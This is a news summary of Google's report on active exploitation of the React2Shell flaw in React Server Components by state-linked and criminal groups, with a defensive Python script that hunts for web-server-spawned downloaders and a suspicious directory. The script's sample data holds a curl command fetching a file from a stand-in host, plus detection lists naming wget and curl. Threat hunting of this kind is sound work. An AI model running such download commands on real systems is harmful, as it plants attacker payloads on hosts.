China, Iran are having a field day with React2Shell, Google warns

Summary

Google’s threat intelligence team reports widespread exploitation of React2Shell (CVE-2025-55182), a maximum-severity unauthenticated remote code execution flaw in React Server Components. Multiple China-linked espionage crews, Iran-nexus actors and financially motivated criminals are using the bug to install backdoors, tunnelers and cryptocurrency miners. Several named Chinese groups (UNC6600, UNC6586, UNC6588, UNC6603, UNC6595) have been observed deploying payloads such as Minocat, Snowlight, Compood, Hisonic and Angryrebel.Linux. Additional React bugs (CVE-2025-55183, CVE-2025-55184, CVE-2025-67779) disclosed recently enable DoS and potential source-code leaks.

Key Points

  • CVE-2025-55182 (React2Shell) allows unauthenticated remote code execution in React Server Components and is actively exploited.
  • Google observed at least five additional PRC-aligned groups plus Iran-linked actors and cybercriminals abusing the flaw.
  • Observed payloads include backdoors (Snowlight, Compood, Hisonic), tunnelers (Minocat) and XMRig cryptocurrency miners.
  • Victims span cloud and on-prem infrastructure; some Chinese actors target AWS and Alibaba Cloud instances in APAC.
  • Three more React vulnerabilities were disclosed (CVE-2025-55183, CVE-2025-55184, CVE-2025-67779) that can cause DoS or leak Server Function source code.
  • Detection recommendations: patch React Server Components, monitor for wget/curl from webserver processes and outbound connections, and hunt for IOCs and suspicious directories like $HOME/.systemd-utils.
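The two host-level hunts in the last bullet (downloaders spawned beneath a web server process, and the $HOME/.systemd-utils directory) are easy to script. The following is an added example, not code from Google's report or The Register's article: it parses a process snapshot in `ps -eo pid,ppid,comm,args` format, walks each wget/curl process up its parent chain looking for a web-server ancestor, and flags paths that contain the suspicious directory name. The process snapshot and path list are constructed sample data, and the set of web-server process names (a Node-based React host) is an assumption to adjust for your own deployment.

```python
"""Hunt helpers for the React2Shell (CVE-2025-55182) detection advice.

Added example; SAMPLE_PS and SAMPLE_PATHS are CONSTRUCTED data, not real
host output. WEB_SERVER_NAMES is an assumption about what a React Server
Components host looks like (a Node process); adjust it to your environment.
"""
from __future__ import annotations

from dataclasses import dataclass

# Assumption: processes that serve the React app. Add your reverse proxy or
# process manager if it is the direct parent of the app workers.
WEB_SERVER_NAMES = {"node", "next-server", "npm", "pm2"}

# Download tools that a web server process has no legitimate reason to spawn.
DOWNLOADER_NAMES = {"wget", "curl"}

# Suspicious directory name called out in the advisory.
SUSPICIOUS_DIR = ".systemd-utils"

# Constructed snapshot in `ps -eo pid,ppid,comm,args` layout (203.0.113.0/24
# is a documentation range, not a real indicator).
SAMPLE_PS = """\
  PID  PPID COMMAND  COMMAND
    1     0 systemd  /sbin/init
  812     1 sshd     /usr/sbin/sshd -D
 1300     1 node     node server.js
 1412  1300 sh       sh -c curl -s -o /tmp/x http://203.0.113.10/x
 1413  1412 curl     curl -s -o /tmp/x http://203.0.113.10/x
 2200   812 curl     curl https://example.org/update.tar.gz
"""

# Constructed list of paths, e.g. the output of a `find / -maxdepth 3` sweep.
SAMPLE_PATHS = [
    "/home/www/.systemd-utils/run",
    "/home/www/app",
    "/root/.systemd-utils",
    "/usr/lib/systemd/system",
]


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str
    args: str


def parse_ps(snapshot: str) -> dict[int, Proc]:
    """Parse ps output (header on the first line) into a pid -> Proc map."""
    procs: dict[int, Proc] = {}
    for line in snapshot.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue  # malformed line; skip rather than abort the hunt
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3] if len(parts) == 4 else comm
        procs[pid] = Proc(pid, ppid, comm, args)
    return procs


def web_server_ancestor(procs: dict[int, Proc], pid: int) -> Proc | None:
    """Walk up the parent chain; return the first web-server ancestor, if any."""
    cur = procs.get(pid)
    for _ in range(64):  # bound the walk in case of a malformed snapshot
        if cur is None:
            return None
        parent = procs.get(cur.ppid)
        if parent is None or parent.pid == cur.pid:
            return None
        if parent.comm in WEB_SERVER_NAMES:
            return parent
        cur = parent
    return None


def find_downloads_from_webserver(snapshot: str) -> list[tuple[Proc, Proc]]:
    """Return (downloader, web-server ancestor) pairs worth triaging."""
    procs = parse_ps(snapshot)
    hits: list[tuple[Proc, Proc]] = []
    for p in procs.values():
        if p.comm in DOWNLOADER_NAMES:
            ancestor = web_server_ancestor(procs, p.pid)
            if ancestor is not None:
                hits.append((p, ancestor))
    return hits


def find_suspicious_dirs(paths: list[str]) -> list[str]:
    """Flag any path that has .systemd-utils as one of its components."""
    return [p for p in paths if SUSPICIOUS_DIR in p.split("/")]


if __name__ == "__main__":
    for downloader, server in find_downloads_from_webserver(SAMPLE_PS):
        print(f"[!] pid {downloader.pid} ({downloader.args!r}) "
              f"descends from {server.comm} pid {server.pid}")
    for path in find_suspicious_dirs(SAMPLE_PATHS):
        print(f"[!] suspicious directory: {path}")
```

On a live host, feed `parse_ps` the output of `ps -eo pid,ppid,comm,args` and `find_suspicious_dirs` a path listing; the curl launched by sshd in the sample is deliberately not flagged, since the parent chain matters more than the tool name.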

Why should I read this?

Because this is ugly and it matters — fast. If you run React Server Components or host services in cloud VPSes, attackers are already weaponising the hole to plant backdoors and miners. Read it so you can patch and stop the nasties before they make you clean up someone else’s mess.

Context and relevance

The React2Shell exploit surfaced days after disclosure and quickly became a go-to for state-aligned espionage and opportunistic criminals alike. The speed and breadth of exploitation underline two trends: first, critical RCEs in popular libraries are instant targets; second, cloud instances and VPS-hosted infrastructure remain high-value targets for both data exfiltration and illicit mining. Organisations should treat these disclosures as urgent: patching, network egress monitoring and IOC hunting are immediate priorities.

Google’s report also highlights underground sharing of PoC scanners and tools, meaning unpatched systems are likely to be found and exploited automatically. Combine this with additional React bugs enabling DoS and secret leaks, and the risk profile for web-facing React environments is elevated.

Source

Source: https://go.theregister.com/feed/www.theregister.com/2025/12/15/react2shell_flaw_china_iran/